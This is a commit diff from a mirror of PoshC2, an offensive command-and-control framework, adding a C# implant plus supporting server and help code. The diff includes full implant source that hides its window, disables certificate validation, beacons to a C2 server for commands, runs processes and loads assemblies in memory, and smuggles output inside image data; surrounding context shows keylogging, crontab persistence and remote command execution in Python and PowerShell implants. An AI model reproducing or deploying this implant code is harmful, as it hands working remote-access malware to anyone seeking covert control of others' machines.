infosecn1nja
/
PoshC2_Python
mirror of https://github.com/infosecn1nja/PoshC2_Python.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Added CSharp Implant/Dll/Shellcode - More functionality coming soon

chunking
benpturner 2018-12-27 12:10:46 +00:00
parent 971ef58e83
commit 190cb33288
15 changed files with 870 additions and 147 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

12
AutoLoads.py
View File

@ -2,7 +2,7 @@
from DB import *
from Config import *
import os
import os, base64
def check_module_loaded( module_name, randomuri, force=False ):
try:
@ -15,19 +15,19 @@ def check_module_loaded( module_name, randomuri, force=False ):
module = file.read()
new_task(("loadmodule %s" % module_name), randomuri)
if modules_loaded:
new_modules_loaded = "%s %s" % (modules_loaded, module_name)
new_modules_loaded = "%s %s" % (modules_loaded, module_name)
if module_name in modules_loaded:
loaded = "YES"
else:
for modname in os.listdir("%s/Modules/" % POSHDIR):
if modname.lower() in module_name.lower():
module_name = modname
file = open(("%sModules/%s" % (POSHDIR,module_name)), "r")
file = open(("%sModules/%s" % (POSHDIR,module_name)), "r")
module = file.read()
new_task(("loadmodule %s" % module_name), randomuri)
update_mods(new_modules_loaded, randomuri)
else:
new_modules_loaded = "%s" % (module_name)
new_modules_loaded = "%s" % (module_name)
file = open(("%sModules/%s" % (POSHDIR,module_name)), "r")
module = file.read()
new_task(("loadmodule %s" % module_name), randomuri)
@ -134,7 +134,7 @@ def run_autoloads(command, randomuri):
if "get-wmiregcachedrdpconnection" in command.lower(): check_module_loaded("powerview.ps1", randomuri)
if "get-wmiregmounteddrive" in command.lower(): check_module_loaded("powerview.ps1", randomuri)
if "invoke-wmievent" in command.lower(): check_module_loaded("Invoke-WMIEvent.ps1", randomuri)
if "remove-wmievent" in command.lower(): check_module_loaded("Invoke-WMIEvent.ps1", randomuri)
if "remove-wmievent" in command.lower(): check_module_loaded("Invoke-WMIEvent.ps1", randomuri)
if "invoke-wmi" in command.lower(): check_module_loaded("Invoke-WMIExec.ps1", randomuri)
if "get-lapspasswords" in command.lower(): check_module_loaded("Get-LAPSPasswords.ps1", randomuri)

18
C2Server.py
View File

@ -125,8 +125,24 @@ class MyHandler(BaseHTTPServer.BaseHTTPRequestHandler):
implant_type = "Daisy"
if s.path == ("%s?m" % new_implant_url):
implant_type = "OSX"
if s.path == ("%s?c" % new_implant_url):
implant_type = "C#"
if implant_type == "C#":
cookieVal = (s.cookieHeader).replace("SessionID=","")
decCookie = decrypt(KEY, cookieVal)
IPAddress = "%s:%s" % (s.client_address[0],s.client_address[1])
Domain,User,Hostname,Arch,PID,Proxy = decCookie.split(";")
newImplant = Implant(IPAddress, implant_type, Domain.decode("utf-8"), User.decode("utf-8"), Hostname.decode("utf-8"), Arch, PID, Proxy)
newImplant.save()
newImplant.display()
responseVal = encrypt(KEY, newImplant.SharpCore)
s.send_response(200)
s.send_header("Content-type", "text/html")
s.end_headers()
s.wfile.write(responseVal)
if implant_type == "OSX":
elif implant_type == "OSX":
cookieVal = (s.cookieHeader).replace("SessionID=","")
decCookie = decrypt(KEY, cookieVal)
IPAddress = "%s:%s" % (s.client_address[0],s.client_address[1])

20
Core.py
View File

@ -11,7 +11,7 @@ def formStr(varstr, instr):
holder = []
str1 = ''
str2 = ''
str1 = varstr + ' = "' + instr[:56] + '"'
str1 = varstr + ' = "' + instr[:56] + '"'
for i in xrange(56, len(instr), 48):
holder.append('"'+instr[i:i+48])
str2 = '"\r\n'.join(holder)
@ -24,7 +24,7 @@ def formStrMacro(varstr, instr):
holder = []
str1 = ''
str2 = ''
str1 = varstr + ' = "' + instr[:54] + '"'
str1 = varstr + ' = "' + instr[:54] + '"'
for i in xrange(54, len(instr), 48):
holder.append(varstr + ' = '+ varstr +' + "'+instr[i:i+48])
str2 = '"\r\n'.join(holder)
@ -38,13 +38,17 @@ def load_module(module_name):
file = codecs.open(("%sModules/%s" % (POSHDIR,module_name)), 'r', encoding='utf-8-sig')
return file.read()
def load_module_sharp(module_name):
file = open(("%sModules/%s" % (POSHDIR,module_name)), 'r+b')
return base64.b64encode(file.read())
def get_images():
dir_path = os.path.dirname(os.path.realpath(__file__))
rootimagedir = "%s/Images/" % dir_path
images = ""
for root, dirs, filenames in os.walk(rootimagedir):
count = 1
for f in filenames:
for f in filenames:
if count == 5:
with open(rootimagedir+f, "rb") as image_file:
image = image_file.read()
@ -65,21 +69,21 @@ def gen_key():
def randomuri(size = 15, chars=string.ascii_letters + string.digits):
return ''.join(random.choice(chars) for _ in range(size))
# Decrypt a string from base64 encoding
# Decrypt a string from base64 encoding
def get_encryption( key, iv='0123456789ABCDEF' ):
from Crypto.Cipher import AES
iv = os.urandom(AES.block_size)
aes = AES.new( base64.b64decode(key), AES.MODE_CBC, iv )
return aes
# Decrypt a string from base64 encoding
# Decrypt a string from base64 encoding
def decrypt( key, data ):
iv = data[0:16]
aes = get_encryption(key, iv)
data = aes.decrypt( base64.b64decode(data) )
return data[16:]
# Decrypt a string from base64 encoding
# Decrypt a string from base64 encoding
def decrypt_bytes_gzip( key, data):
iv = data[0:16]
aes = get_encryption(key, iv)
@ -100,7 +104,7 @@ def encrypt( key, data, gzip=False ):
out = StringIO.StringIO()
with gzip.GzipFile(fileobj=out, mode="w") as f:
f.write(data)
data = out.getvalue()
data = out.getvalue()
# Pad with zeros
mod = len(data) % 16
@ -111,4 +115,4 @@ def encrypt( key, data, gzip=False ):
data = aes.IV + aes.encrypt( data )
if not gzip:
data = base64.b64encode( data )
return data
return data

506
Files/Sharp.cs Normal file
View File

@ -0,0 +1,506 @@
using System;
using System.Linq;
using System.Net;
using System.Text;
using System.Text.RegularExpressions;
using System.Reflection;
using System.Threading;
using System.Diagnostics;
using System.Runtime.InteropServices;
using System.IO;
using System.IO.Compression;
//mono-csc /opt/PoshC2_Python_Git/Files/Sharp.cs -out:/tmp/Sharp.dll -target:library
//cat /tmp/Sharp.dll | base64 -w 0 | xclip
public class Program
{
[DllImport("kernel32.dll")]
static extern IntPtr GetConsoleWindow();
[DllImport("user32.dll")]
static extern bool ShowWindow(IntPtr hWnd, int nCmdShow);
public const int SW_HIDE = 0;
public const int SW_SHOW = 5;
public static void Sharp()
{
var handle = GetConsoleWindow();
ShowWindow(handle, SW_HIDE);
AllowUntrustedCertificates();
try { primer(); } catch {}
Thread.Sleep(300000);
try { primer(); } catch { }
Thread.Sleep(600000);
try { primer(); } catch { }
}
public static void Main()
{
Sharp();
}
static byte[] Combine(byte[] first, byte[] second)
{
byte[] ret = new byte[first.Length + second.Length];
Buffer.BlockCopy(first, 0, ret, 0, first.Length);
Buffer.BlockCopy(second, 0, ret, first.Length, second.Length);
return ret;
}
static System.Net.WebClient GetWebRequest(string cookie)
{
var x = new System.Net.WebClient();
string purl = "#REPLACEPROXYURL#";
string puser = "#REPLACEPROXYUSER#";
string ppass = "#REPLACEPROXYPASSWORD#";
if (!String.IsNullOrEmpty(purl)) {
WebProxy proxy = new WebProxy();
proxy.Address = new Uri(purl);
proxy.Credentials = new NetworkCredential(puser, ppass);
proxy.UseDefaultCredentials = false;
proxy.BypassProxyOnLocal = false;
x.Proxy = proxy;
}
string df = "#REPLACEDF#";
if (!String.IsNullOrEmpty(df)) {
x.Headers.Add("Host",df);
}
x.Headers.Add("User-Agent", "#REPLACEUSERAGENT#");
x.Headers.Add("Referer", "#REPLACEREFERER#");
if (cookie != null)
{
x.Headers.Add(System.Net.HttpRequestHeader.Cookie, $"SessionID={cookie}");
}
return x;
}
static string Decryption(string key, string enc)
{
var b = System.Convert.FromBase64String(enc);
Byte[] IV = new Byte[16];
Array.Copy(b, IV, 16);
try {
var a = CAMR(key, System.Convert.ToBase64String(IV));
var d = a.CreateDecryptor();
var u = d.TransformFinalBlock(b, 16, b.Length - 16);
return System.Text.Encoding.UTF8.GetString(u);
} catch {
var a = CAMA(key, System.Convert.ToBase64String(IV));
var d = a.CreateDecryptor();
var u = d.TransformFinalBlock(b, 16, b.Length - 16);
return System.Text.Encoding.UTF8.GetString(u);
}
}
static string Encryption(string key, string un, bool comp = false)
{
var b = System.Text.Encoding.UTF8.GetBytes(un);
byte[] byEnc = b;
if (comp){
byEnc = Compress(b);
}
try {
var a = CAMR(key, null);
var e = a.CreateEncryptor();
var f = e.TransformFinalBlock(byEnc, 0, byEnc.Length);
byte[] p = null;
p = Combine(a.IV, f);
return System.Convert.ToBase64String(p);
} catch {
var a = CAMA(key, null);
var e = a.CreateEncryptor();
var f = e.TransformFinalBlock(byEnc, 0, byEnc.Length);
byte[] p = null;
p = Combine(a.IV, f);
return System.Convert.ToBase64String(p);
}
}
static System.Security.Cryptography.AesCryptoServiceProvider CAMA(string key,string IV)
{
System.Security.Cryptography.AesCryptoServiceProvider b = new System.Security.Cryptography.AesCryptoServiceProvider();
b.Mode = System.Security.Cryptography.CipherMode.CBC;
b.Padding = System.Security.Cryptography.PaddingMode.Zeros;
b.BlockSize = 128;
b.KeySize = 256;
if (IV != null)
{
b.IV = System.Convert.FromBase64String(IV);
}
if (key != null)
{
b.Key = System.Convert.FromBase64String(key);
}
return b;
}
static System.Security.Cryptography.RijndaelManaged CAMR(string key,string IV)
{
System.Security.Cryptography.RijndaelManaged a = new System.Security.Cryptography.RijndaelManaged();
a.Mode = System.Security.Cryptography.CipherMode.CBC;
a.Padding = System.Security.Cryptography.PaddingMode.Zeros;
a.BlockSize = 128;
a.KeySize = 256;
if (IV != null)
{
a.IV = System.Convert.FromBase64String(IV);
}
if (key != null)
{
a.Key = System.Convert.FromBase64String(key);
}
return a;
}
static void AllowUntrustedCertificates()
{
try
{
System.Net.ServicePointManager.ServerCertificateValidationCallback = new System.Net.Security.RemoteCertificateValidationCallback(delegate { return true; } );
}
catch { }
}
static void primer()
{
DateTime now = DateTime.Now;
DateTime killDate = Convert.ToDateTime("#REPLACEKILLDATE#");
if (killDate < now){
System.Environment.Exit(1);
}
var u = System.Security.Principal.WindowsIdentity.GetCurrent().Name;
var dn = System.Environment.UserDomainName;
var cn = System.Environment.GetEnvironmentVariable("COMPUTERNAME");
var arch = System.Environment.GetEnvironmentVariable("PROCESSOR_ARCHITECTURE");
int pid = Process.GetCurrentProcess().Id;
Environment.CurrentDirectory = Environment.GetEnvironmentVariable("windir");
string o = $"{dn};{u};{cn};{arch};{pid};#REPLACEBASEURL#";
string key = "#REPLACEKEY#";
var pp = Encryption(key, o);
string baseURL = "#REPLACEBASEURL#";
string s = "#REPLACESTARTURL#";
var primer = GetWebRequest(pp).DownloadString(s);
var x = Decryption(key, primer);
Regex re = new Regex("RANDOMURI19901(.*)10991IRUMODNAR");
Match m = re.Match(x);
string RandomURI = m.Groups[1].ToString();
re = new Regex("URLS10484390243(.*)34209348401SLRU");
m = re.Match(x);
string URLS = m.Groups[1].ToString();
re = new Regex("KILLDATE1665(.*)5661ETADLLIK");
m = re.Match(x);
var KillDate = m.Groups[1].ToString();
re = new Regex("SLEEP98001(.*)10089PEELS");
m = re.Match(x);
var Sleep = m.Groups[1].ToString();
re = new Regex("NEWKEY8839394(.*)4939388YEKWEN");
m = re.Match(x);
var NewKey = m.Groups[1].ToString();
re = new Regex("IMGS19459394(.*)49395491SGMI");
m = re.Match(x);
var IMGs = m.Groups[1].ToString();
ImplantCore(baseURL, RandomURI, URLS, KillDate, Sleep, NewKey, IMGs);
}
static byte[] Compress(byte[] raw)
{
using (MemoryStream memory = new MemoryStream())
{
using (GZipStream gzip = new GZipStream(memory, CompressionMode.Compress, true))
{
gzip.Write(raw, 0, raw.Length);
}
return memory.ToArray();
}
}
static byte[] GetImgData(byte[] cmdoutput, string[] stringnewIMGS)
{
Random rnd = new Random();
string randimg = stringnewIMGS[rnd.Next(stringnewIMGS.Length)];
byte[] imgBytes = System.Convert.FromBase64String(randimg);
var maxByteslen = 1500;
var maxDatalen = 1500 + cmdoutput.Length;
var imageByteslen = imgBytes.Length;
var paddingByteslen = maxByteslen - imageByteslen;
var BytePadding = System.Text.Encoding.UTF8.GetBytes((RandomString(paddingByteslen)));
var ImageBytesFull = new byte[maxDatalen];
System.Array.Copy(imgBytes, 0, ImageBytesFull, 0, imgBytes.Length);
System.Array.Copy(BytePadding, 0, ImageBytesFull, imgBytes.Length, BytePadding.Length);
System.Array.Copy(cmdoutput, 0, ImageBytesFull, imgBytes.Length + BytePadding.Length, cmdoutput.Length);
return ImageBytesFull;
}
static Random random = new Random();
static string RandomString(int length)
{
const string chars = "...................@..........................Tyscf";
return new string(Enumerable.Repeat(chars, length).Select(s => s[random.Next(s.Length)]).ToArray());
}
static Type LoadSomething(string assemblyQualifiedName)
{
// Throws exception is type was not found
return Type.GetType(
assemblyQualifiedName,
(name) =>
{
// Returns the assembly of the type by enumerating loaded assemblies
// in the app domain
return AppDomain.CurrentDomain.GetAssemblies().Where(z => z.FullName == name.FullName).FirstOrDefault();
},
null,
true);
}
static void ImplantCore(string baseURL, string RandomURI, string stringURLS, string KillDate, string Sleep, string Key, string stringIMGS)
{
var re = new Regex("(?<=\")[^\"]*(?=\")|[^\" ]+");
string strURLS = stringURLS.Replace(",","");
var stringnewURLS = re.Matches(strURLS).Cast<Match>().Select(m => m.Value).ToArray();
stringnewURLS = stringnewURLS.Where(m => !string.IsNullOrEmpty(m)).ToArray();
string strIMGS = stringIMGS.Replace(",","");
var stringnewIMGS = re.Matches(strIMGS).Cast<Match>().Select(m => m.Value).ToArray();
stringnewIMGS = stringnewIMGS.Where(m => !string.IsNullOrEmpty(m)).ToArray();
int beacontime = 5;
if (!Int32.TryParse(Sleep, out beacontime))
{
beacontime = 5;
}
while(true)
{
Random rnd = new Random();
string URL = stringnewURLS[rnd.Next(stringnewURLS.Length)];
string G = (Guid.NewGuid()).ToString();
URL = baseURL+"/"+URL+G+"/?"+RandomURI;
Thread.Sleep(beacontime*1000);
DateTime now = DateTime.Now;
DateTime killDate = Convert.ToDateTime(KillDate);
if (killDate < now){
System.Environment.Exit(1);
}
var cmd = GetWebRequest(null).DownloadString(URL);
string output = "";
try {
string x = "";
try {
x = Decryption(Key, cmd);
x = x.Replace("\0", string.Empty);
} catch {}
using (System.IO.StreamWriter file = new System.IO.StreamWriter(@"C:\temp\log.txt", true))
{
file.WriteLine(x.ToString().TrimEnd());
}
if (x.ToLower().StartsWith("multicmd"))
{
string splitcmd = x.Replace("multicmd","");
string[] split = splitcmd.Split(new string[] {"!d-3dion@LD!-d"}, StringSplitOptions.RemoveEmptyEntries);
foreach (string c in split)
{
output = "";
//add download-file
//add upload-file
//add implant-core features, screenshot, tasklist, etc
if (c.ToLower() == "pwd") {
output = Directory.GetCurrentDirectory();
}
if (c.ToLower().StartsWith("dir") || c.ToLower().StartsWith("ls")){
string dirPath = "";
var stringOutput = new StringWriter();
Console.SetOut(stringOutput);
if (c.ToLower() == "dir" || c.ToLower() == "ls") {
dirPath = Directory.GetCurrentDirectory();
} else {
dirPath = Regex.Replace(c, "dir ", "", RegexOptions.IgnoreCase);
dirPath = Regex.Replace(c, "ls ", "", RegexOptions.IgnoreCase);
}
Console.WriteLine("Directory listing: {0} \r\n", dirPath);
string[] folderPaths = Directory.GetDirectories(dirPath, "*", SearchOption.TopDirectoryOnly);
foreach (var f in folderPaths)
{
try {
Console.WriteLine("d----- {0}", f.Normalize());
}
catch {}
}
string[] filePaths = Directory.GetFiles(dirPath, "*", SearchOption.TopDirectoryOnly);
foreach (var f in filePaths)
{
try {
Console.WriteLine("------ {0}", f.Normalize());
}
catch {}
}
output = stringOutput.ToString();
}
// load and execute assembly in current app domain
if (c.ToLower().StartsWith("loadmodule")){
//var stringOutput = new StringWriter();
//Console.SetOut(stringOutput);
string module = Regex.Replace(c, "loadmodule", "", RegexOptions.IgnoreCase);
Assembly assembly = System.Reflection.Assembly.Load(System.Convert.FromBase64String(module));
//var pop = assembly.GetType("Seatbelt.Program").InvokeMember("UserChecks", BindingFlags.InvokeMethod, null, null, null);
//output = stringOutput.ToString();
}
// list loaded assemblies
if (c.ToLower().StartsWith("listmodules")){
var appd = AppDomain.CurrentDomain.GetAssemblies();
foreach (var ass in appd)
{
output += ass.FullName.ToString() + "\n";
}
}
if (c.ToLower() == "ps"){
var loadedType = LoadSomething("ProcHandler, Get-ProcessList, Version=1.0.0.0, Culture=neutral, PublicKeyToken=null");
var xxx = loadedType.Assembly.GetType("ProcHandler").InvokeMember("GetProcesses", BindingFlags.InvokeMethod, null, null, null);
output = xxx.ToString();
}
// run loaded assemblies
if (c.ToLower().StartsWith("run-assembly")){
string[] splitargs = c.Split(new string[] {" "}, StringSplitOptions.RemoveEmptyEntries);
string qualifiedname = splitargs[1];
string name = splitargs[2];
string method = splitargs[3];
var AppDomainAss = AppDomain.CurrentDomain.GetAssemblies();
foreach (var Ass in AppDomainAss)
{
if (Ass.FullName.ToString().ToLower().StartsWith(name.ToLower()))
{
var stringOutput = new StringWriter();
Console.SetOut(stringOutput);
var loadedType = LoadSomething(qualifiedname + ", " + Ass.FullName);
var xxx = loadedType.Assembly.GetType(qualifiedname).InvokeMember(method, BindingFlags.InvokeMethod, null, null, null);
output = stringOutput.ToString();
}
}
}
// try to load another app domain and unload each time
if (c.ToLower().StartsWith("loadmodule-appdomain")){
var stringOutput = new StringWriter();
Console.SetOut(stringOutput);
string module = Regex.Replace(c, "loadmodule", "", RegexOptions.IgnoreCase);
AppDomain dom = AppDomain.CreateDomain("RANDOM");
Assembly assembly = dom.Load(System.Convert.FromBase64String(module));
var pop = assembly.GetType("Seatbelt.Program").InvokeMember("UserChecks", BindingFlags.InvokeMethod, null, null, null);
output = stringOutput.ToString();
AppDomain.Unload(dom);
}
if (c.ToLower().StartsWith("exit")){
System.Environment.Exit(1);
}
if (c.ToLower().StartsWith("start-process")){
string proc = c.Replace("'", "");
proc = proc.Replace("\"", "");
string pstart = Regex.Replace(proc, "start-process ", "", RegexOptions.IgnoreCase);
pstart = Regex.Replace(pstart, "-argumentlist(.*)", "", RegexOptions.IgnoreCase);
string args = Regex.Replace(proc, "(.*)argumentlist ", "", RegexOptions.IgnoreCase);
Process p = new Process();
p.StartInfo.UseShellExecute = false;
p.StartInfo.RedirectStandardOutput = true;
p.StartInfo.RedirectStandardError = true;
p.StartInfo.CreateNoWindow = true;
p.StartInfo.FileName = pstart;
p.StartInfo.Arguments = args;
p.Start();
output = p.StandardOutput.ReadToEnd();
output = output + p.StandardError.ReadToEnd();
p.WaitForExit();
}
if (c.ToLower().StartsWith("setbeacon") || c.ToLower().StartsWith("beacon")) {
string beacon = Regex.Replace(c, "setbeacon ", "", RegexOptions.IgnoreCase);
beacon = Regex.Replace(beacon, "beacon ", "", RegexOptions.IgnoreCase);
if (beacon.ToLower().Contains("s"))
{
beacon = Regex.Replace(beacon, "s", "", RegexOptions.IgnoreCase);
if (!Int32.TryParse(beacon, out beacontime))
{
beacontime = 5;
}
}
else if (beacon.ToLower().Contains("m"))
{
beacon = Regex.Replace(beacon, "m", "", RegexOptions.IgnoreCase);
if (!Int32.TryParse(beacon, out beacontime))
{
beacontime = 5;
}
beacontime = beacontime * 60;
}
else if (beacon.ToLower().Contains("h"))
{
beacon = Regex.Replace(beacon, "h", "", RegexOptions.IgnoreCase);
if (!Int32.TryParse(beacon, out beacontime))
{
beacontime = 5;
}
beacontime = beacontime * 60;
beacontime = beacontime * 60;
}
else if (!Int32.TryParse(beacon, out beacontime))
{
beacontime = 5;
}
}
URL = stringnewURLS[rnd.Next(stringnewURLS.Length)];
G = (Guid.NewGuid()).ToString();
URL = baseURL+"/"+URL+G+"/?"+RandomURI;
string task = Encryption(Key, c);
string coutput = Encryption(Key, output, true);
byte[] outputBytes = System.Convert.FromBase64String(coutput);
byte[] sendBytes = GetImgData(outputBytes, stringnewIMGS);
GetWebRequest(task).UploadData(URL, sendBytes);
}
}
} catch (Exception e) {
URL = stringnewURLS[rnd.Next(stringnewURLS.Length)];
URL = baseURL+"/"+URL+RandomURI;
string task = Encryption(Key, "Error");
string eroutput = Encryption(Key, "Error: " + output + e, true);
byte[] outputBytes = System.Convert.FromBase64String(eroutput);
byte[] sendBytes = GetImgData(outputBytes, stringnewIMGS);
GetWebRequest(task).UploadData(URL, sendBytes);
}
}
}
}

34
Help.py
View File

@ -1,13 +1,13 @@
#!/usr/bin/python
logopic = """__________ .__. _________ ________
\_______ \____ _____| |__ \_ ___ \ \_____ \
logopic = """ __________ .__. _________ ________
\_______ \____ _____| |__ \_ ___ \ \_____ \\
| ___/ _ \/ ___/ | \ / \ \/ / ____/
| | ( <_> )___ \| Y \ \ \____/ \
|____| \____/____ >___| / \______ /\_______ \
| | ( <_> )___ \| Y \ \ \____/ \\
|____| \____/____ >___| / \______ /\_______ \\
\/ \/ \/ \/
=============== v4.5 www.PoshC2.co.uk ============="""
=============== v4.6 www.PoshC2.co.uk ============="""
py_help1 = """
Implant Features:
@ -34,6 +34,26 @@ searchhelp mimikatz
back
"""
sharp_help1 = """
Implant Features:
=====================
ps
beacon 60s / beacon 10m / beacon 2h
ls/dir c:\\temp\\
pwd
loadmodule
loadmoduleforce
listmodule
run-assembly ProcHandler Get-ProcessList GetProcesses
start-process net -argumentlist users
kill-implant
hide-implant
unhide-implant
help
searchhelp listmodules
back
"""
posh_help1 = """
Implant Features:
=====================
@ -366,3 +386,5 @@ COMMANDS += ['invoke-psexecproxypayload','invoke-wmiproxypayload', 'invoke-dcomp
COMMANDS += ['invoke-psexecdaisypayload','invoke-wmidaisypayload', 'invoke-dcomdaisypayload']
UXCOMMANDS = ["unhide-implant","hide-implant","help","searchhelp","python","loadmodule","loadmoduleforce","get-keystrokes","back","upload-file","download-file","install-persistence","remove-persistence","sai","startanotherimplant-keepfile","get-screenshot","startanotherimplant","pwd","id","ps","setbeacon","kill-implant"]
SHARPCOMMANDS = ["unhide-implant","ls","pwd","dir","start-process", "hide-implant","help","searchhelp","listmodules","loadmodule","loadmoduleforce","back","ps","beacon","setbeacon","kill-implant"]

69
Implant.py
View File

@ -31,6 +31,13 @@ class Implant(object):
self.ServerURL = new_serverurl = select_item("HostnameIP", "C2Server")
self.AllBeaconURLs = get_otherbeaconurls()
self.AllBeaconImages = get_images()
self.SharpCore = """
RANDOMURI19901%s10991IRUMODNAR
URLS10484390243%s34209348401SLRU
KILLDATE1665%s5661ETADLLIK
SLEEP98001%s10089PEELS
NEWKEY8839394%s4939388YEKWEN
IMGS19459394%s49395491SGMI""" % (self.RandomURI, self.AllBeaconURLs, self.KillDate, self.Sleep, self.Key, self.AllBeaconImages)
with open("%spy_dropper.py" % (PayloadsDirectory), 'rb') as f:
self.PythonImplant = base64.b64encode(f.read())
self.PythonCore = """import urllib2, os, subprocess, re, datetime, time, base64, string, random
@ -52,7 +59,7 @@ def keylog():
exec(modpayload)
pids = os.popen('ps aux | grep " ruby" | grep -v grep').read()
returnval = "%%s \\r\\nKeylogger started here: %%s" %% (pids, filename)
return returnval
return returnval
def dfile(fname):
if fname:
@ -102,7 +109,7 @@ def persist():
def remove_persist():
import subprocess as s
s.call("crontab -l | { cat; } | grep -v '_psh.sh'| crontab -", shell=True)
return "Removed user persistence via crontab: \\r\\n**must delete files manually**"
return "Removed user persistence via crontab: \\r\\n**must delete files manually**"
def decrypt_bytes_gzip( key, data):
iv = data[0:16]
@ -146,23 +153,23 @@ while(True):
for cmd in split:
if cmd[:10] == "$sleeptime":
timer = int(cmd.replace("$sleeptime = ",""))
elif cmd[:13] == "download-file":
elif cmd[:13] == "download-file":
fname = cmd.replace("download-file ","")
returnval = dfile(fname)
elif cmd[:11] == "upload-file":
returnval = dfile(fname)
elif cmd[:11] == "upload-file":
fullparams = cmd.replace("upload-file ","")
params = fullparams.split(":")
returnval = ufile(params[1],params[0])
elif cmd[:19] == "install-persistence":
returnval = persist()
elif cmd[:14] == "get-keystrokes":
returnval = ufile(params[1],params[0])
elif cmd[:19] == "install-persistence":
returnval = persist()
elif cmd[:14] == "get-keystrokes":
returnval = keylog()
elif cmd[:18] == "remove-persistence":
returnval = remove_persist()
elif cmd[:19] == "startanotherimplant":
elif cmd[:18] == "remove-persistence":
returnval = remove_persist()
elif cmd[:19] == "startanotherimplant":
returnval = sai(delfile=True)
elif cmd[:28] == "startanotherimplant-keepfile":
returnval = sai()
returnval = sai()
elif cmd[:10] == "loadmodule":
module = cmd.replace("loadmodule","")
exec(module)
@ -190,7 +197,7 @@ while(True):
returnval = "Error with source file: %%s" %% e
elif cmd[:6] == "python":
module = cmd.replace("python ","")
module = cmd.replace("python ","")
try:
import sys
import StringIO
@ -245,7 +252,7 @@ $payloadclear = @"
function DEC {${function:DEC}}
function ENC {${function:ENC}}
function CAM {${function:CAM}}
function Get-Webclient {${function:Get-Webclient}}
function Get-Webclient {${function:Get-Webclient}}
function Primer {${function:primer}}
`$primer = primer
if (`$primer) {`$primer| iex} else {
@ -272,14 +279,14 @@ function GetImgData($cmdoutput) {
try {$image = $icoimage|get-random}catch{}
function randomgen
function randomgen
{
param (
[int]$Length
)
$set = "...................@..........................Tyscf".ToCharArray()
$result = ""
for ($x = 0; $x -lt $Length; $x++)
for ($x = 0; $x -lt $Length; $x++)
{$result += $set | Get-Random}
return $result
}
@ -289,7 +296,7 @@ function GetImgData($cmdoutput) {
$imagebyteslen = $imageBytes.Length
$paddingbyteslen = $maxbyteslen - $imagebyteslen
$BytePadding = [System.Text.Encoding]::UTF8.GetBytes((randomgen $paddingbyteslen))
$ImageBytesFull = New-Object byte[] $maxdatalen
$ImageBytesFull = New-Object byte[] $maxdatalen
[System.Array]::Copy($imageBytes, 0, $ImageBytesFull, 0, $imageBytes.Length)
[System.Array]::Copy($BytePadding, 0, $ImageBytesFull,$imageBytes.Length, $BytePadding.Length)
[System.Array]::Copy($cmdoutput, 0, $ImageBytesFull,$imageBytes.Length+$BytePadding.Length, $cmdoutput.Length )
@ -340,10 +347,10 @@ function Encrypt-Bytes($key, $bytes) {
$gzipStream.Close()
$bytes = $output.ToArray()
$output.Close()
$aesManaged = Create-AesManagedObject $key
$encryptor = $aesManaged.CreateEncryptor()
$aesManaged = Create-AesManagedObject $key
$encryptor = $aesManaged.CreateEncryptor()
$encryptedData = $encryptor.TransformFinalBlock($bytes, 0, $bytes.Length)
[byte[]] $fullData = $aesManaged.IV + $encryptedData
[byte[]] $fullData = $aesManaged.IV + $encryptedData
$fullData
}
function Decrypt-String($key, $encryptedStringWithIV) {
@ -358,7 +365,7 @@ function Decrypt-String($key, $encryptedStringWithIV) {
function Encrypt-String2($key, $unencryptedString) {
$unencryptedBytes = [system.Text.Encoding]::UTF8.GetBytes($unencryptedString)
$CompressedStream = New-Object IO.MemoryStream
$DeflateStream = New-Object System.IO.Compression.GzipStream $CompressedStream, ([IO.Compression.CompressionMode]::Compress)
$DeflateStream = New-Object System.IO.Compression.GzipStream $CompressedStream, ([IO.Compression.CompressionMode]::Compress)
$DeflateStream.Write($unencryptedBytes, 0, $unencryptedBytes.Length)
$DeflateStream.Dispose()
$bytes = $CompressedStream.ToArray()
@ -393,7 +400,7 @@ while($true)
if ($killdate -lt $date) {exit}
$sleeptimeran = $sleeptime, ($sleeptime * 1.1), ($sleeptime * 0.9)
$newsleep = $sleeptimeran|get-random
if ($newsleep -lt 1) {$newsleep = 5}
if ($newsleep -lt 1) {$newsleep = 5}
start-sleep $newsleep
$URLS = %s
$RandomURI = Get-Random $URLS
@ -441,7 +448,7 @@ while($true)
} elseif ($i.ToLower().StartsWith("loadmodule")) {
try {
$modulename = $i -replace "LoadModule",""
$Output = Invoke-Expression $modulename | out-string
$Output = Invoke-Expression $modulename | out-string
$Output = $Output + "123456PS " + (Get-Location).Path + ">654321"
$ModuleLoaded = Encrypt-String $key "ModuleLoaded"
$Output = Encrypt-String2 $key $Output
@ -452,7 +459,7 @@ while($true)
}
} else {
try {
$Output = Invoke-Expression $i | out-string
$Output = Invoke-Expression $i | out-string
$Output = $Output + "123456PS " + (Get-Location).Path + ">654321"
$StdError = ($error[0] | Out-String)
if ($StdError){
@ -469,7 +476,7 @@ while($true)
(Get-Webclient -Cookie $Response).UploadData("$Server", $UploadBytes)|out-null
} catch{}
}
}
}
}
elseif ($ReadCommandClear.ToLower().StartsWith("upload-file")) {
try {
@ -494,7 +501,7 @@ while($true)
} elseif ($ReadCommandClear.ToLower().StartsWith("loadmodule")) {
try {
$modulename = $ReadCommandClear -replace "LoadModule",""
$Output = Invoke-Expression $modulename | out-string
$Output = Invoke-Expression $modulename | out-string
$Output = $Output + "123456PS " + (Get-Location).Path + ">654321"
$ModuleLoaded = Encrypt-String $key "ModuleLoaded"
$Output = Encrypt-String2 $key $Output
@ -506,7 +513,7 @@ while($true)
} else {
try {
$Output = Invoke-Expression $ReadCommandClear | out-string
$Output = Invoke-Expression $ReadCommandClear | out-string
$Output = $Output + "123456PS " + (Get-Location).Path + ">654321"
$StdError = ($error[0] | Out-String)
if ($StdError){
@ -528,7 +535,7 @@ while($true)
break
}
}""" % (self.Key, self.Sleep, self.AllBeaconImages, self.RandomURI, self.RandomURI, self.KillDate, self.AllBeaconURLs)
#Add all db elements
#Add all db elements
def display(self):
print Colours.GREEN,""
@ -551,7 +558,7 @@ while($true)
engine.say("Nice, we have an implant")
engine.runAndWait()
except Exception as e:
EspeakError = "espeak error"
EspeakError = "espeak error"
try:
apikey = select_item("APIKEY","C2Server")
@ -590,4 +597,4 @@ while($true)
if result:
autoruns = ""
for autorun in result:
new_task(autorun[1], self.RandomURI)
new_task(autorun[1], self.RandomURI)

162
ImplantHandler.py
View File

@ -5,7 +5,7 @@ import datetime
from datetime import datetime, timedelta
from sqlite3 import Error
from Help import *
from AutoLoads import *
from AutoLoads import *
from DB import *
from Colours import *
from Config import *
@ -21,12 +21,12 @@ def createproxypayload():
proxyuser = raw_input("Proxy User: e.g. Domain\\user ")
